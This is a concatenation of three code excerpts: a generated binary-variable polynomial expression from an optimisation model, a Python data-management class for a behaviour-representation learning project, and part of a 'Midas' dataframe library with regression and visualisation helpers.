m.b518 - 2*m.b97*m.b383 + 2*m.b97 - 2*m.b97*m.b398 + 2*m.b97*m.b424 - 4*m.b424 - 2*m.b97*
m.b523 + 2*m.b98*m.b344 + m.b98 + 2*m.b98*m.b354 - 3*m.b354 - 2*m.b98*m.b391 - 2*m.b98*m.b397
- 2*m.b98*m.b522 - 2*m.b99*m.b387 + 4*m.b99 - 2*m.b99*m.b392 - 2*m.b99*m.b393 + 2*m.b99*
m.b478 - 2*m.b99*m.b517 - 2*m.b99*m.b518 + 2*m.b100*m.b284 + 2*m.b100*m.b304 + 2*m.b100*m.b344
+ 2*m.b100*m.b354 - 2*m.b100*m.b392 - 2*m.b100*m.b396 - 2*m.b100*m.b517 - 2*m.b100*m.b521 + 2
*m.b101*m.b363 - 2*m.b101 + 2*m.b101*m.b373 - 2*m.b101*m.b382 - 2*m.b101*m.b383 - 2*m.b101*
m.b385 + 2*m.b101*m.b408 - 2*m.b408 + 2*m.b101*m.b424 + 2*m.b101*m.b453 - 2*m.b102*m.b388 +
m.b102 + 2*m.b102*m.b391 - 2*m.b102*m.b397 + 2*m.b102*m.b489 - 2*m.b489 - 2*m.b102*m.b522 + 2*
m.b103*m.b324 - 2*m.b103 + 2*m.b103*m.b334 + 2*m.b103*m.b363 + 2*m.b103*m.b373 - 2*m.b103*
m.b384 - 2*m.b103*m.b385 - 2*m.b103*m.b393 + 2*m.b103*m.b439 + 2*m.b103*m.b453 - 2*m.b103*
m.b518 - 2*m.b104*m.b383 + 4*m.b104 - 2*m.b104*m.b396 - 2*m.b104*m.b398 + 2*m.b104*m.b424 - 2*
m.b104*m.b521 - 2*m.b104*m.b523 - 2*m.b106*m.b341 + 3*m.b106 - 2*m.b106*m.b485 - 2*m.b106*
m.b506 + 2*m.b107*m.b277 - 2*m.b107 + 2*m.b107*m.b296 + 2*m.b107*m.b300 - 2*m.b107*m.b324 - 2*
m.b107*m.b330 - m.b330 - 2*m.b107*m.b332 - m.b332 + 2*m.b107*m.b387 + 2*m.b107*m.b389 - 2*
m.b108*m.b327 + 5*m.b108 + m.b327 - 2*m.b108*m.b335 - 2*m.b108*m.b339 + 2*m.b339 + 2*m.b108*
m.b435 - 4*m.b435 + 2*m.b108*m.b437 - 4*m.b437 - 2*m.b108*m.b479 + 6*m.b479 - 2*m.b108*m.b483
+ 7*m.b483 - 2*m.b108*m.b500 + 8*m.b500 - 2*m.b108*m.b504 + 8*m.b504 - 2*m.b109*m.b332 + 2*
m.b109 - 2*m.b109*m.b476 - 2*m.b110*m.b328 + 4*m.b110 + m.b328 - 2*m.b110*m.b329 - 2*m.b110*
m.b338 - 2*m.b110*m.b340 + 2*m.b110*m.b449 - 7*m.b449 + 2*m.b110*m.b451 - 10*m.b451 + 2*m.b110
*m.b462 - m.b462 + 2*m.b110*m.b464 - 2*m.b464 - 2*m.b110*m.b482 - 2*m.b110*m.b484 + 5*m.b484
- 2*m.b110*m.b503 - 2*m.b110*m.b505 + 10*m.b505 - 2*m.b111*m.b332 + 5*m.b111 - 2*m.b111*
m.b338 - 2*m.b111*m.b476 - 2*m.b111*m.b482 - 2*m.b111*m.b503 - 2*m.b114*m.b336 + 3*m.b114 +
m.b336 - 2*m.b114*m.b480 + 6*m.b480 - 2*m.b114*m.b501 + 12*m.b501 - 2*m.b115*m.b326 + 2*m.b115
+ 2*m.b326 - 2*m.b115*m.b341 + 2*m.b115*m.b420 - 7*m.b420 + 2*m.b115*m.b422 - 12*m.b422 - 2*
m.b115*m.b485 - 2*m.b115*m.b506 - 2*m.b116*m.b322 + 5*m.b116 - 2*m.b116*m.b334 - 2*m.b116*
m.b340 + 2*m.b116*m.b350 - 4*m.b350 + 2*m.b116*m.b352 - 8*m.b352 - 2*m.b116*m.b478 - 2*m.b116*
m.b484 - 2*m.b116*m.b499 - 2*m.b116*m.b505 - 2*m.b117*m.b330 + 6*m.b117 - 2*m.b117*m.b335 - 2*
m.b117*m.b336 + 2*m.b117*m.b476 - 2*m.b117*m.b479 - 2*m.b117*m.b480 - 2*m.b117*m.b500 - 2*
m.b117*m.b501 + 2*m.b118*m.b277 + 2*m.b118 + 2*m.b118*m.b296 + 2*m.b118*m.b300 - 2*m.b118*
m.b322 - 2*m.b118*m.b335 - 2*m.b118*m.b339 + 2*m.b118*m.b350 + 2*m.b118*m.b352 - 2*m.b118*
m.b479 - 2*m.b118*m.b483 - 2*m.b118*m.b500 - 2*m.b118*m.b504 - 2*m.b119*m.b323 - 4*m.b119 - 2*
m.b119*m.b325 - 2*m.b119*m.b326 - 2*m.b119*m.b328 + 2*m.b119*m.b369 + 2*m.b119*m.b371 + 2*
m.b119*m.b404 - 3*m.b404 + 2*m.b119*m.b406 - 4*m.b406 + 2*m.b119*m.b420 + 2*m.b119*m.b422 + 2*
m.b119*m.b449 + 2*m.b119*m.b451 - 2*m.b120*m.b324 + 3*m.b120 - 2*m.b120*m.b331 - 2*m.b120*
m.b340 + 2*m.b120*m.b387 + 2*m.b120*m.b389 - 2*m.b120*m.b475 + 3*m.b475 - 2*m.b120*m.b484 + 2*
m.b120*m.b487 - 4*m.b487 - 2*m.b120*m.b505 - 2*m.b121*m.b323 - 2*m.b121 - 2*m.b121*m.b327 - 2*
m.b121*m.b328 + 2*m.b121*m.b330 + 2*m.b121*m.b332 - 2*m.b121*m.b336 + 2*m.b121*m.b369 + 2*
m.b121*m.b371 + 2*m.b121*m.b435 + 2*m.b121*m.b437 + 2*m.b121*m.b449 + 2*m.b121*m.b451 - 2*
m.b121*m.b480 - 2*m.b121*m.b501 - 2*m.b122*m.b326 + 5*m.b122 - 2*m.b122*m.b339 - 2*m.b122*
m.b341 + 2*m.b122*m.b420 + 2*m.b122*m.b422 - 2*m.b122*m.b483 - 2*m.b122*m.b485 - 2*m.b122*
m.b504 - 2*m.b122*m.b506 + 2*m.b124*m.b318 - 4*m.b124 + 2*m.b124*m.b398 + 2*m.b124*m.b485 + 2*
m.b124*m.b506 + 2*m.b125*m.b446 - 3*m.b125 + 2*m.b125*m.b530 + 2*m.b125*m.b548 + 2*m.b126*
m.b506 - m.b126 + 2*m.b127*m.b460 - 4*m.b127 + 2*m.b127*m.b473 + 2*m.b127*m.b545 + 2*m.b127*
m.b550 + 2*m.b128*m.b506 - 2*m.b128 + 2*m.b128*m.b545 + 2*m.b131*m.b536 - m.b131 + 2*m.b132*
m.b431 - m.b132 + 2*m.b133*m.b361 - 3*m.b133 + 2*m.b133*m.b523 + 2*m.b133*m.b550 + 2*m.b134*
m.b485 - 3*m.b134 + 2*m.b134*m.b530 + 2*m.b134*m.b536 + 2*m.b135*m.b318 - 4*m.b135 + 2*m.b135*
m.b361 + 2*m.b135*m.b530 + 2*m.b135*m.b548 + 2*m.b136*m.b380 - 4*m.b136 + 2*m.b136*m.b415 + 2*
m.b136*m.b431 + 2*m.b136*m.b460 + 2*m.b137*m.b398 - 3*m.b137 + 2*m.b137*m.b496 + 2*m.b137*
m.b550 + 2*m.b138*m.b341 - 5*m.b138 + 2*m.b138*m.b380 + 2*m.b138*m.b446 + 2*m.b138*m.b460 + 2*
m.b138*m.b536 + 2*m.b139*m.b431 - 2*m.b139 + 2*m.b139*m.b548 - 2*m.b141*m.b290 + 8*m.b141 - 2*
m.b141*m.b306 - 2*m.b141*m.b314 - 2*m.b141*m.b384 - 2*m.b141*m.b392 - 2*m.b141*m.b396 + 2*
m.b141*m.b435 + 2*m.b141*m.b437 - 2*m.b141*m.b479 - 2*m.b141*m.b483 - 2*m.b141*m.b500 - 2*
m.b141*m.b504 - 2*m.b142*m.b300 + 3*m.b142 - 2*m.b142*m.b389 - 2*m.b142*m.b476 - 2*m.b143*
m.b292 + 8*m.b143 - 2*m.b143*m.b294 - 2*m.b143*m.b312 - 2*m.b143*m.b316 - 2*m.b143*m.b385 - 2*
m.b143*m.b386 - 2*m.b143*m.b395 - 2*m.b143*m.b397 + 2*m.b143*m.b449 + 2*m.b143*m.b451 + 2*
m.b143*m.b462 + 2*m.b143*m.b464 - 2*m.b143*m.b482 - 2*m.b143*m.b484 - 2*m.b143*m.b503 - 2*
m.b143*m.b505 - 2*m.b144*m.b300 + 7*m.b144 - 2*m.b144*m.b312 - 2*m.b144*m.b389 - 2*m.b144*
m.b395 - 2*m.b144*m.b476 - 2*m.b144*m.b482 - 2*m.b144*m.b503 - 2*m.b147*m.b308 + 4*m.b147 - 2*
m.b147*m.b393 - 2*m.b147*m.b480 - 2*m.b147*m.b501 - 2*m.b148*m.b288 + 4*m.b148 - 2*m.b148*
m.b318 - 2*m.b148*m.b383 - 2*m.b148*m.b398 + 2*m.b148*m.b420 + 2*m.b148*m.b422 - 2*m.b148*
m.b485 - 2*m.b148*m.b506 - 2*m.b149*m.b280 + 6*m.b149 - 2*m.b149*m.b304 - 2*m.b149*m.b316 + 2*
m.b149*m.b344 + 2*m.b149*m.b350 + 2*m.b149*m.b352 - 2*m.b149*m.b391 - 2*m.b149*m.b397 - 2*
m.b149*m.b478 - 2*m.b149*m.b484 - 2*m.b149*m.b499 - 2*m.b149*m.b505 - 2*m.b150*m.b296 + 9*
m.b150 - 2*m.b150*m.b306 - 2*m.b150*m.b308 - 2*m.b150*m.b387 - 2*m.b150*m.b392 - 2*m.b150*
m.b393 + 2*m.b150*m.b476 - 2*m.b150*m.b479 - 2*m.b150*m.b480 - 2*m.b150*m.b500 - 2*m.b150*
m.b501 - 2*m.b151*m.b280 + 3*m.b151 + 2*m.b151*m.b284 + 2*m.b151*m.b296 + 2*m.b151*m.b300 - 2*
m.b151*m.b306 - 2*m.b151*m.b314 + 2*m.b151*m.b344 + 2*m.b151*m.b350 + 2*m.b151*m.b352 - 2*
m.b151*m.b392 - 2*m.b151*m.b396 - 2*m.b151*m.b479 - 2*m.b151*m.b483 - 2*m.b151*m.b500 - 2*
m.b151*m.b504 - 2*m.b152*m.b282 - 2*m.b152 - 2*m.b152*m.b286 - 2*m.b152*m.b288 - 2*m.b152*
m.b292 + 2*m.b152*m.b363 + 2*m.b152*m.b369 + 2*m.b152*m.b371 - 2*m.b152*m.b382 - 2*m.b152*
m.b383 - 2*m.b152*m.b385 + 2*m.b152*m.b404 + 2*m.b152*m.b406 + 2*m.b152*m.b420 + 2*m.b152*
m.b422 + 2*m.b152*m.b449 + 2*m.b152*m.b451 - 2*m.b153*m.b284 + 5*m.b153 - 2*m.b153*m.b298 - 2*
m.b153*m.b316 + 2*m.b153*m.b387 - 2*m.b153*m.b388 + 2*m.b153*m.b389 - 2*m.b153*m.b397 - 2*
m.b153*m.b475 - 2*m.b153*m.b484 + 2*m.b153*m.b487 - 2*m.b153*m.b505 - 2*m.b154*m.b277 - 2*
m.b154*m.b282 - 2*m.b154*m.b290 - 2*m.b154*m.b292 - 2*m.b154*m.b308 + 2*m.b154*m.b324 + 2*
m.b154*m.b330 + 2*m.b154*m.b332 + 2*m.b154*m.b363 + 2*m.b154*m.b369 + 2*m.b154*m.b371 - 2*
m.b154*m.b384 - 2*m.b154*m.b385 - 2*m.b154*m.b393 + 2*m.b154*m.b435 + 2*m.b154*m.b437 + 2*
m.b154*m.b449 + 2*m.b154*m.b451 - 2*m.b154*m.b480 - 2*m.b154*m.b501 - 2*m.b155*m.b288 + 8*
m.b155 - 2*m.b155*m.b314 - 2*m.b155*m.b318 - 2*m.b155*m.b383 - 2*m.b155*m.b396 - 2*m.b155*
m.b398 + 2*m.b155*m.b420 + 2*m.b155*m.b422 - 2*m.b155*m.b483 - 2*m.b155*m.b485 - 2*m.b155*
m.b504 - 2*m.b155*m.b506 - 2*m.b157*m.b437 - m.b157 + 2*m.b157*m.b500 + 2*m.b157*m.b504 - 2*
m.b158*m.b433 + 2*m.b158 + m.b433 - 2*m.b158*m.b434 - 2*m.b158*m.b443 - 2*m.b158*m.b445 + 2*
m.b158*m.b454 - 5*m.b454 + 2*m.b158*m.b458 - m.b458 + 2*m.b158*m.b467 + m.b467 + 2*m.b158*
m.b471 + m.b471 - 2*m.b158*m.b527 - 2*m.b158*m.b529 + m.b529 + 2*m.b158*m.b543 - 2*m.b158*
m.b547 - m.b547 - 2*m.b159*m.b437 - 2*m.b159*m.b443 + 2*m.b159*m.b500 + 2*m.b159*m.b504 - 2*
m.b159*m.b527 + 2*m.b159*m.b543 - 2*m.b162*m.b441 + m.b162 + m.b441 - 2*m.b162*m.b525 + 2*
m.b525 + 2*m.b162*m.b534 + m.b534 + 2*m.b163*m.b417 - 2*m.b417 + 2*m.b163*m.b425 - 5*m.b425 +
2*m.b163*m.b429 - 2*m.b429 - 2*m.b163*m.b446 - 2*m.b163*m.b530 - 2*m.b163*m.b548 + 2*m.b164*
m.b347 - m.b164 + 2*m.b164*m.b355 - m.b355 + 2*m.b164*m.b359 + m.b359 - 2*m.b164*m.b439 - 2*
m.b164*m.b445 + 2*m.b164*m.b517 + 2*m.b164*m.b521 - 2*m.b164*m.b529 - 2*m.b164*m.b547 - 2*
m.b165*m.b435 - 2*m.b165*m.b440 - m.b440 - 2*m.b165*m.b441 + 2*m.b165*m.b479 + 2*m.b165*m.b483
- 2*m.b165*m.b525 + 2*m.b165*m.b528 + 3*m.b528 + 2*m.b165*m.b534 + 2*m.b166*m.b290 - 4*m.b166
+ 2*m.b166*m.b306 + 2*m.b166*m.b314 + 2*m.b166*m.b347 + 2*m.b166*m.b355 + 2*m.b166*m.b359 - 2
*m.b166*m.b440 - 2*m.b166*m.b444 + m.b444 + 2*m.b167*m.b366 - 10*m.b167 + 2*m.b167*m.b374 + 2*
m.b167*m.b378 + 2*m.b167*m.b401 + 2*m.b167*m.b409 - 3*m.b409 + 2*m.b167*m.b413 - m.b413 + 2*
m.b167*m.b417 + 2*m.b167*m.b425 + 2*m.b167*m.b429 - 2*m.b167*m.b433 + 2*m.b167*m.b454 + 2*
m.b167*m.b458 + 2*m.b168*m.b384 | |
<gh_stars>1-10
"""
Author: Anonymous
Description:
Data management class
Some important components:
- Attributes:
- original data (parameter & collision info), labels,
embedded and redonctructed data
- cluster assignments and cluster mean and std
- (TODO) trajectories (state & action)
- Methods:
- update_clusters: performs clusterring in the latent space
- update_representations: updates embedding and
reconstructed data
- generate_data: calls dategen object method to get a new
population and add it
- generate_batch: samples batches from the stored data
- plot_spaces: data visualisation
"""
import os
import csv
import logging
import pickle
import numpy as np
from functools import partial
from itertools import product, combinations
from operator import itemgetter
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import behaviour_representations.exploration.manage_datagen as mdgen
import behaviour_representations.clustering.manage_cluster as mclstr
import behaviour_representations.training.batching as mbatch
from behaviour_representations.utils.utils import (timing,
info_outcome,
pad_traj,
uniquify_by_key)
from behaviour_representations.utils.utils import _TAB, _SEED
from behaviour_representations.utils.utils import transform_PCA_TSNE
logger = logging.getLogger(__name__)
class DataManager(object):
"""
Class that manages data storage, generation and batching.
"""
def __init__(self, load_dataset_path, load_model_path,
dimred_mode, filter_mbd=True,
**taskargs_dict):
self.dirname = taskargs_dict['experiment_directory']
self.load_dataset_path = load_dataset_path
self.load_model_path = load_model_path
self.ds_rate = 20
# Managers
self.datagen_object = mdgen.DataGenManager(**taskargs_dict)
self.skip_clust = False
self.cluster_object = mclstr.ClusterManager(**taskargs_dict)
self.batch_object = mbatch.BatchManager(**taskargs_dict)
# Initialise data containers
self._init_data()
# Metrics containers
self._uniquify_metric = filter_mbd
# self._uniquify_metric = filter_mbd if filter_mbd is not None else \
# '_mape_' in taskargs_dict['exploration']['normal']
# Dimensionalities
self.num_outcomes = self.datagen_object.num_outcomes
self.inputdim_param_ae = self.datagen_object.parameter_dims
self.inputdim_traj_ae = self.datagen_object.traj_dim
# self.latentdim_param_ae = self.datagen_object.latent_dim
# self.latentdim_traj_ae = self.datagen_object.latent_dim
self.traj_len = self.inputdim_traj_ae[0]
# Training
self.training_loss_dict = {}
# Initialise statistics
self.standard_save = True
# Dimensionality reduction technique for visualisation
self.dimred = dimred_mode if isinstance(dimred_mode, list) \
else [dimred_mode]
# Normalise data before embedding flag
if taskargs_dict['experiment']['type']=='displacement':
self._normalise_flag = 'gaussian'
elif taskargs_dict['experiment']['type']=='nn_policy' \
and self.datagen_object.stype is not None:
self._normalise_flag = 'scaled'
else:
self._normalise_flag = False
logger.info("DATASET PRE-PROCESSING: scaling: '{}'; range: {}".format(
self.datagen_object.stype, self.datagen_object.srange))
# Initialise data discovery writer csv if new experiment
if not os.path.isdir(self.dirname):
os.makedirs(self.dirname)
filepath = '{}/ref_data_{}_{}.csv'.format(
self.dirname,
self.datagen_object.ctrl_name,
self.datagen_object.exploration_normal)
if not os.path.isfile(filepath):
with open(filepath, 'a') as outfile:
writer = csv.DictWriter(outfile,
fieldnames = ["nloop", "niter", "nsmp", "nstep", "coverage",
"fitness", "outcomes", "ratios"])
writer.writeheader()
""" MANAGE DATASET """
def _init_data(self):
# Parameter containers
self.outcomes = None # [n_samples, 1]
self.param_original = None # [n_samples, parameters_dim]
self.param_embedded = None # [n_samples, latentdim_param_ae]
self.param_reconstructed = None # [n_samples, parameters_dim]
self.recn_error = None
self.new_data = None
self.param_stats = {}
self.latent_stats = {}
# Trajectory
self.traj_original = None
self.traj_embedded = None
self.traj_reconstructed = None
self.traj_data = {}
self.traj_data['main'] = None # [n_samples, traj_len, traj_dim]
self.traj_data['aux'] = None # [n_samples, traj_len, traj_dim]
# self.traj_main = None # [n_samples, traj_len, traj_dim]
# self.traj_aux = None # [n_samples, traj_len, traj_dim]
# Metrics containers
self.metric_bd = None
self.metric_traj_dtw = None # [n_samples, n_samples]
self.metric_traj_dtw_norm = None
# Initialise statistics
self.num_datapoints = 0
self.classes_per_loop = []
def _add_data(self, new_data_dict, embedding_fn=None,
**kwargs):
# Add generated data
if new_data_dict is not None:
if self.param_original is None:
self.param_original = new_data_dict['param_original']
self.outcomes = new_data_dict['outcomes']
self.traj_data['main'] = new_data_dict['traj_main']
self.traj_data['aux'] = new_data_dict['traj_aux']
# make a padded version of trajectories (max 1000 steps)
self.traj_original = pad_traj(new_data_dict['traj_main'],
max_len=self.traj_len)
self.metric_bd = new_data_dict['metric_bd']
else:
self.param_original = np.vstack([self.param_original,
new_data_dict['param_original']])
self.outcomes = np.vstack([self.outcomes,
new_data_dict['outcomes']])
# self.outcomes = np.append(self.outcomes, new_data_dict['outcomes'])
self.traj_data['main'].extend(new_data_dict['traj_main'])
self.traj_data['aux'].extend(new_data_dict['traj_aux'])
# make a padded version of trajectories (max 1000 steps)
self.traj_original = np.vstack([self.traj_original,
pad_traj(new_data_dict['traj_main'],
max_len=self.traj_len)])
self.metric_bd = np.vstack([self.metric_bd,
new_data_dict['metric_bd']])
# Log new data
logger.info("DATASET: ({} + {}): {}\n".format(
self.num_datapoints, len(new_data_dict['outcomes']) \
if new_data_dict is not None else 0,
info_outcome(self.outcomes)))
# Update the data manager info
self._update_info(**kwargs)
# Update embedding and reconstruction data
if embedding_fn is not None :
self.update_representations(embedding_fn=embedding_fn,**kwargs)
else:
logger.info("DATASET ({}): No new unique points! {}\n".format(
self.num_datapoints, info_outcome(self.outcomes)))
# Log added data
# Save class label progress
class_sz = {0:0, -1:0}
class_sz.update({cc:np.count_nonzero(self.outcomes[:,0]==cc) \
for cc in np.unique(self.outcomes[:,0])})
self.classes_per_loop.append(class_sz)
if self.standard_save: self.save_dataset()
def _update_info(self, loaded=False, **kwargs):
""" Update statistics and remove duplicate parameters """
# Update data sizes
self.unique_classes = np.unique(self.outcomes[:,0])
self.num_datapoints = len(self.outcomes)
# self.num_outcomes = len(self.unique_classes)
# Update dataset statistics
all_param = self.param_original.reshape(self.num_datapoints, -1)
all_param = all_param[:, np.invert(np.isinf(all_param[0,:]))]
self.param_stats['mu'] = np.mean(all_param, axis=0)
self.param_stats['std'] = np.std(all_param, axis=0)
self.param_stats['cov'] = np.cov(all_param, rowvar=False)
# self.param_stats['mu'] = np.zeros(self.param_original.shape[1:])
# self.param_stats['std'] = np.ones(self.param_original.shape[1:])
# self.param_stats['cov'] = np.eye(np.prod(
# self.param_original.shape[1:]))
# Refresh datapoint-cluster information (prepare for reclustering)
# CLUSTER STATISTICS make as a method
if not self.skip_clust:
if self.cluster_object.datapoint_losses is not None:
new_data_zeros = np.zeros(self.outcomes.shape[0] - \
self.cluster_object.datapoint_losses.shape[0])
self.cluster_object.datapoint_losses = \
np.append(self.datapoint_losses, new_data_zeros)
self.cluster_object.has_loss = \
np.append(self.has_loss, new_data_zeros.astype(int))
# reset datapoints to cluster
self.cluster_object.datapoints_to_cluster = \
np.zeros_like(self.outcomes, int)
def apply_normalisation(self, data):
""" Transform data based on normalisation flag """
if self._normalise_flag=='gaussian':
zero_std_idxs = np.where(self.param_stats['std'] == 0)
if len(zero_std_idxs[0]):
self.param_stats['std'][zero_std_idxs] = 1.
return (data - self.param_stats['mu'])/self.param_stats['std']
elif self._normalise_flag=='scaled':
scale = max(self.datagen_object.srange)
assert scale > 0
return data / scale
else:
return data
def apply_denormalisation(self, data):
""" Apply inverse transform to data based on normalisation flag """
if self._normalise_flag=='gaussian':
return data * self.param_stats['std'] + self.param_stats['mu']
elif self._normalise_flag=='scaled':
scale = max(self.datagen_object.srange)
assert scale > 0
return data * scale
else:
return data
def update_representations(self, embedding_fn, recn_fn=None,
ae_name='param',
verbose=False, save_dataset=False, **kwargs):
# Update Autoencoder latent and reconstruction space
if ae_name=='param' or ae_name=='pca':
self.param_embedded = embedding_fn(self.param_original)
# self.latentdim_param_ae = self.param_embedded.shape[1]
if recn_fn is not None:
self.param_reconstructed = recn_fn(self.param_embedded)
tmp_orig = self.param_original.reshape(self.param_original.shape[0], -1)
tmp_recn = self.param_reconstructed.reshape(self.param_reconstructed.shape[0], -1)
ninf_idx = np.where(tmp_recn[0]<np.inf)[0]
errors = tmp_orig[:, ninf_idx] - tmp_recn[:, ninf_idx]
self.recn_error = np.linalg.norm(errors, axis=1)
self.training_loss_dict[ae_name] = {'reconstruction':
np.mean(self.recn_error)}
# ADD also plot reconstructed trajectories
# Update clustering and info
if not self.skip_clust:
self.cluster_object.update_clusters(self.param_embedded,
self.outcomes,
verbose=verbose)
else:
logger.info(">>> skipping clustering.\n")
elif ae_name=='traj':
self.traj_embedded = embedding_fn(self.traj_original)
# self.latentdim_traj_ae = self.traj_embedded.shape[1]
if recn_fn is not None:
self.traj_reconstructed = recn_fn(self.traj_embedded)
# Update dataset statistics
self.latent_stats['mu'] = np.mean(self.param_embedded, axis=0)
self.latent_stats['std'] = np.std(self.param_embedded, axis=0)
self.latent_stats['cov'] = np.cov(self.param_embedded.reshape(
self.num_datapoints,-1), rowvar=False)
if save_dataset: self.save_dataset()
def save_dataset(self):
task_data_dict = {
# data
"outcomes": self.outcomes,
"param_original": self.param_original,
"param_embedded": self.param_embedded,
"param_reconstructed": self.param_reconstructed,
"recn_error": self.recn_error,
# trajectories and behaviours
"traj_original": self.traj_original,
"traj_embedded": self.traj_embedded,
"traj_reconstructed": self.traj_reconstructed,
"traj_main": self.traj_data['main'],
"traj_aux": self.traj_data['aux'],
"metric_bd": self.metric_bd,
"metric_traj_dtw": self.metric_traj_dtw,
# cluster stuff
"classes_per_loop": self.classes_per_loop,
"datapoints_to_cluster": self.cluster_object.datapoints_to_cluster,
"cluster_to_class": self.cluster_object.cluster_to_class,
"cluster_to_datapoints": self.cluster_object.cluster_to_datapoints,
"cluster_to_centroids": self.cluster_object.cluster_to_centroids,
# plotting samples
# "sample_emb": self._sample_emb,
# "sample_recn":self._sample_recn,
}
if not os.path.isdir(self.dirname):
logger.warning("No directory {}; Creating...".format(self.dirname))
os.makedirs(self.dirname)
with open(self.dirname+"/experiment_dataset.dat", "wb") as f:
pickle.dump(task_data_dict, f)
# @timing
def load_dataset(self, write_loaded=True):
"""
Load data from file and use it as first loop 0
"""
self.datagen_object.initial = False
with open(self.load_dataset_path+"/experiment_dataset.dat", "rb") as f:
task_data_dict = pickle.load(f)
self.outcomes = task_data_dict['outcomes']
self.param_original = task_data_dict['param_original']
self.param_embedded = task_data_dict['param_embedded']
self.param_reconstructed = task_data_dict['param_reconstructed']
self.recn_error = task_data_dict['recn_error']
self.traj_original = task_data_dict['traj_original']
self.traj_embedded = task_data_dict['traj_embedded']
self.traj_reconstructed = task_data_dict['traj_reconstructed']
self.traj_original = task_data_dict['traj_original']
self.traj_data['main'] = task_data_dict['traj_main']
self.traj_data['aux'] = task_data_dict['traj_aux']
if 'metric_bd' in task_data_dict.keys():
self.metric_bd = task_data_dict['metric_bd']
else:
self.metric_bd = task_data_dict['metric_conbin']
self.metric_traj_dtw = task_data_dict['metric_traj_dtw']
self.cluster_object.datapoints_to_cluster = \
task_data_dict['datapoints_to_cluster']
self.cluster_object.cluster_to_class = \
task_data_dict['cluster_to_class']
self.cluster_object.cluster_to_datapoints = \
task_data_dict['cluster_to_datapoints']
self.cluster_object.num_clusters = \
len(task_data_dict['cluster_to_datapoints'])
self.cluster_object.get_cluster_centroids(self.param_embedded)
self.cluster_object.get_cluster_medoids(self.param_embedded)
# Update dataset statistics
self.unique_classes = np.unique(self.outcomes)
self.num_datapoints = len(self.outcomes)
self.metric_traj_dtw_norm = \
None if self.metric_traj_dtw is None \
else self.metric_traj_dtw / np.max(self.metric_traj_dtw)
if self.load_model_path is None:
class_sz = {0:0, -1:0}
class_sz.update({cc:np.count_nonzero(self.outcomes==cc) \
for cc in np.unique(self.outcomes)})
self.classes_per_loop.append(class_sz)
else:
self.classes_per_loop = task_data_dict['classes_per_loop']
class_sz = self.classes_per_loop[-1]
# Log info
logging.info("RESTORED saved dataset; {} datapoints; "
"Classes: {}\n{}\tLocation: {}".format(
self.outcomes.shape[0], class_sz, _TAB,
self.load_dataset_path+"/experiment_dataset.dat"))
# Save as data generated in Loop 0
if write_loaded:
unique_bds = np.argmax(np.unique(self.metric_bd, axis=0), axis=1)
self._write_discovery(nloop=0, n_new=len(self.outcomes),
unique_bds=unique_bds, outcomes=self.outcomes)
# Update info
self._update_info(loaded=True)
""" MANAGE BATCHING """
def init_batching(self, nloop, nepoch=None, update_dict=None, **kwargs):
""" Syncronise the Batch Manager and get num_iter"""
if update_dict is not None:
self.update_representations(**update_dict)
return self.batch_object.init_batching(
nloop=nloop, nepoch=nepoch,
data_orig=self.param_original,
labels_orig=self.outcomes,
data_recn=self.param_reconstructed,
datagen_object=self.datagen_object,
**kwargs)
def generate_batch(self, **kwargs):
""" Interface to the Batch Manager """
return self.batch_object.generate_batch(
data_orig=self.param_original,
labels_orig=self.outcomes,
data_recn=self.param_reconstructed,
traj_main=self.traj_original,
metric_traj_dtw=self.metric_traj_dtw_norm,
metric_bd=self.metric_bd,
cluster_object=self.cluster_object,
datagen_object=self.datagen_object,
**kwargs)
""" MANAGE DATA GENERATION """
def generate_data(self, nloop,
sample_plot_fn=None, aux_title=None, aux_save=None,
**kwargs):
"""
Generate new data for the dataset, using a _datagen_fn function.
| |
plot_heatmap(self, zoom_start=12, radius=12):
return plot_heatmap(self, zoom_start, radius)
def linear_regression(self, x: str, y: str):
"""simple 1D linear regression
Arguments:
x {str} -- the x column
y {str} -- the y column
Returns:
a tuple of the slope and intercept
"""
x_vals = self[x]
y_vals = self[y]
# mean of our inputs and outputs
x_mean = np.mean(x_vals)
y_mean = np.mean(y_vals)
n = len(self)
numerator = 0
denominator = 0
for i in range(n):
numerator += (x_vals[i] - x_mean) * (y_vals[i] - y_mean)
denominator += (x_vals[i] - x_mean) ** 2
slope = numerator / denominator
intercept = y_mean - (slope * x_mean)
return intercept, slope
def static_vis(self, **kwargs):
"""This function is called inplace of `vis` for reactive cells, whose participation in the event loop is different from the others.
Optional arguments (Midas will guess the rest)
mark -- "bar" | "circle" | "line"
x -- name of the column to be the x axis
x_type -- "ordinal" | "quantitative" | "temporal"
y -- name of the column to be the y axis
y_type -- "ordinal" | "quantitative" | "temporal"
sort -- "" | "x" | "y" | "-x" | "-y"
"""
spec = parse_encoding(kwargs, self)
if spec:
sanity_check_spec_with_data(spec, self)
# do show me
vg_spec = static_vega_gen(spec, self)
# print(vg_spec)
return VegaLite(vg_spec)
return None
def can_join(self, other_df: 'MidasDataFrame', col_name: str,col_name_other: Optional[str]=None):
# assume that the joins are the same name!
if self.df_name and other_df.df_name:
if col_name_other:
columns = [JoinPredicate(ColumnRef(col_name, self.df_name), ColumnRef(col_name_other, other_df.df_name))]
else:
columns = [JoinPredicate(ColumnRef(col_name, self.df_name), ColumnRef(col_name, other_df.df_name))]
join_info = JoinInfo(self, other_df, columns)
self._rt_funcs.add_join_info(join_info)
else:
raise UserError("DF not defined")
def apply_selection(self, all_predicates: List[SelectionValue]):
# if all the selections are null then reply nothing
if len(all_predicates) == 0:
return None
return self._rt_funcs.apply_other_selection(self, all_predicates)
def apply_self_selection_value(self, predicates: List[SelectionValue]):
executable_predicates = list(map(create_predicate, predicates))
return self.apply_predicates(executable_predicates)
def apply_predicates(self, predicates: List[Predicate]) -> 'MidasDataFrame':
# each predicate becomes a where clause, and we can chain them
new_df = self
for p in predicates:
new_df = new_df.where(p.column_or_label, p.value_or_predicate, p.other)
return new_df
def _set_current_filtered_data(self, mdf: Optional['MidasDataFrame']):
self.current_filtered_data = mdf
# not currently used, but might be helpful in the future
# @property
# def is_base_df(self) -> bool:
# return self._ops.op_type == RelationalOpType.base # type: ignore
class RelationalOp(object):
# chilren
op_type: RelationalOpType
child: 'RelationalOp' # type: ignore
def has_child(self):
if hasattr(self, "child") and (self.child is not None):
return True
return False
pass
class BaseOp(RelationalOp):
def __init__(self, df_name: DFName, df_id: DFId, table: Table):
self.op_type = RelationalOpType.base
self.df_name = df_name
self.df_id = df_id
self.table = table
def __repr__(self):
return f"{{{self.op_type.value}: '{self.df_name}'}}"
def __str__(self):
return self.__repr__()
class Select(RelationalOp):
